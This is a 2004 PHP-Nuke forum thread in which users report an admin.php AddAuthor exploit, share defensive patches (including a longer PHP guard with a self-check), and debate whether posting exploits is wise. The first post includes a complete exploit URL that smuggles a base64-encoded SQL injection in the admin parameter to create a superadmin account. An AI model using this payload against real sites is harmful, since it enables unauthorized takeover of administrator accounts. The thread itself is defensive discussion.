ballymuntrev (Hangin' Around)
Joined: Mar 22, 2004 Posts: 49
Posted: Fri Apr 30, 2004 11:32 am

I'm so fecked off with Nuke, every day there's a new exploit or an update to an old exploit. Here's another one, fairly bad this time.
Raven m8, any chance you can update your HackAttempt script to catch and stop it please dude?!?

Code:
http://yoursite.blah/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo bar com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Cheers,
Trev

ballymuntrev (Hangin' Around)
Joined: Mar 22, 2004 Posts: 49
Posted: Fri Apr 30, 2004 11:38 am

For anyone else, edit your admin.php file and add the following...

Code:
// Block the AddAuthor / UpdateAuthor admin operations: if either name appears
// anywhere in the query string, hand the request to hackattempt.php and stop.
if (stristr($_SERVER["QUERY_STRING"], 'AddAuthor') || stristr($_SERVER["QUERY_STRING"], 'UpdateAuthor')) {
    $loc = $_SERVER['QUERY_STRING'];
    header("Location: hackattempt.php?$loc");
    die();
}

Thanks Raven for that, and Chatserv for the code too.

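As an added example for this thread (not the posted snippet, and not Chatserv's or PHP-Nuke's code; hackattempt.php, the log path and the self-check inputs are assumptions), here is a stricter version of the same guard. It decodes the query string with parse_str() and compares the actual `op` value against the blocked names, so a harmless parameter that merely contains the word "AddAuthor" is not flagged while a URL-encoded or oddly-cased `op` still is; it also logs the attempt and passes only the whitelisted operation name on to hackattempt.php instead of echoing the raw query string into the Location header.

```php
<?php
// Added example for this thread; not the code from the post, from Chatserv or
// from PHP-Nuke. hackattempt.php and the log path are assumptions.
//
// Same idea as the posted patch (refuse AddAuthor / UpdateAuthor before admin.php
// gets to them), but matched on the parsed 'op' parameter rather than by
// substring-searching the raw query string.

// Operation names the posted patch blocks, compared case-insensitively.
const BLOCKED_ADMIN_OPS = ['addauthor', 'updateauthor'];

/**
 * Return the blocked operation name found in a parsed parameter array, or null.
 * Arrays (op[]=...) are not a valid operation name and are ignored.
 */
function blocked_op_from_params(array $params): ?string
{
    $op = $params['op'] ?? null;
    if (!is_string($op)) {
        return null;
    }
    $op = strtolower(trim($op));
    return in_array($op, BLOCKED_ADMIN_OPS, true) ? $op : null;
}

/**
 * Same check on a raw query string. parse_str() does the URL decoding, so
 * "op=Add%41uthor" is seen as AddAuthor, while "note=AddAuthor" is not
 * (stristr() on the raw string would have flagged the latter).
 */
function blocked_op_from_query(string $query_string): ?string
{
    $params = [];
    parse_str($query_string, $params);
    return blocked_op_from_params($params);
}

/**
 * One log line per attempt. Control characters are stripped so a crafted
 * query string cannot forge extra lines in the log file.
 */
function hack_attempt_log_line(string $ip, string $op, string $query_string): string
{
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $query_string);
    return sprintf("%s ip=%s op=%s qs=%s\n", date('c'), $ip, $op, substr($clean, 0, 500));
}

if (PHP_SAPI === 'cli') {
    // Self-check with constructed inputs when run as `php guard.php`.
    $checks = [
        blocked_op_from_query('op=AddAuthor&add_aid=x&add_radminsuper=1') === 'addauthor',
        blocked_op_from_query('op=Add%41uthor') === 'addauthor',        // URL-encoded
        blocked_op_from_query('op=updateAUTHOR') === 'updateauthor',    // odd casing
        blocked_op_from_query('op=Authors&note=AddAuthor') === null,    // word elsewhere, not the op
        blocked_op_from_query('op[]=AddAuthor') === null,               // array, not a name
        blocked_op_from_params(['op' => 'UpdateAuthor']) === 'updateauthor',
    ];
    echo in_array(false, $checks, true) ? "self-check FAILED\n" : "self-check ok\n";
} else {
    // Glue for the top of admin.php. The posted snippet only looks at the query
    // string; the operation name can also arrive in a POST body, so check both.
    $qs = $_SERVER['QUERY_STRING'] ?? '';
    $op = blocked_op_from_query($qs) ?? blocked_op_from_params($_POST);
    if ($op !== null) {
        @file_put_contents('/var/log/nuke/hackattempt.log',            // assumed path, outside the web root
            hack_attempt_log_line($_SERVER['REMOTE_ADDR'] ?? '-', $op, $qs),
            FILE_APPEND | LOCK_EX);
        // Pass only the whitelisted operation name on, not the raw query string.
        header('Location: hackattempt.php?op=' . rawurlencode($op));
        exit;
    }
}
```

Run it from the command line to exercise the self-check; under a web server the CLI branch is skipped and the guard runs before the rest of admin.php. Like the posted snippet, it blocks these two operations for everyone, so legitimate author administration has to be done some other way while the guard is in place.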
GanjaUK (Life Cycles Becoming CPU Cycles)
Joined: Feb 14, 2004 Posts: 633 Location: England
Posted: Fri Apr 30, 2004 12:01 pm

I don't think it's such a good idea to post the actual exploit here if that's what it is.
I tried that exploit on my site and it just returns: Illegal Operation

Raven (Site Admin/Owner)
Joined: Aug 27, 2002 Posts: 16987 Location: Kansas
Posted: Fri Apr 30, 2004 12:08 pm

That exploit is published everywhere already since it is not new. That's common code by now. I understand your caution and I appreciate it, but really, in this case, I can't see it causing any harm.

Maku (New Member)
Joined: Sep 24, 2003 Posts: 15 Location: Estonia
Posted: Fri Apr 30, 2004 3:35 pm

You can read about the grand new Coppermine exploit here, and this one is very serious. Right now you can only secure your site if you rename the Coppermine directory or delete it. I hope someone finds a fix soon.

sixonetonoffun (Spouse Contemplates Divorce)
Joined: Jan 02, 2003 Posts: 2499
Posted: Fri Apr 30, 2004 4:00 pm

Coppermine has a reliable support team; I'm sure they'll rewrite and release asap.

ladysilver (Hangin' Around)
Joined: May 03, 2004 Posts: 49 Location: Cyberspace
Posted: Mon May 03, 2004 12:28 pm

I don't use Coppermine, but I've had the exploit attempted at one of my sites anyway. I have to wonder about the mentality of somebody who attempts this attack since the attacker's URL is part of the query string.

Raven (Site Admin/Owner)
Joined: Aug 27, 2002 Posts: 16987 Location: Kansas
Posted: Mon May 03, 2004 12:40 pm

Hey LS! Good to see you. I really appreciate your 'candor' when posting.

ladysilver (Hangin' Around)
Joined: May 03, 2004 Posts: 49 Location: Cyberspace
Posted: Mon May 03, 2004 2:18 pm

Thanks for the good words, Raven. Lol, my goal is 'diplomatic candor', but occasionally I forget.

ballymuntrev (Hangin' Around)
Joined: Mar 22, 2004 Posts: 49
Posted: Thu May 06, 2004 4:41 pm

Sorry if I upset anyone by posting the exploit, but I'm always of the thinking that if an exploit is not published then the community cannot fix it quickly. As it turned out it was an oldish exploit (to me, though, it was new news) and Chatserv had already released a fix for it, thankfully.

sixonetonoffun (Spouse Contemplates Divorce)
Joined: Jan 02, 2003 Posts: 2499
Posted: Thu May 06, 2004 5:30 pm

I don't think we can shoot the messenger. Well, at least as long as the messenger's polite.

ballymuntrev (Hangin' Around)
Joined: Mar 22, 2004 Posts: 49
Posted: Thu May 06, 2004 5:39 pm

I'm always polite, even when I've been shot at with real bullets.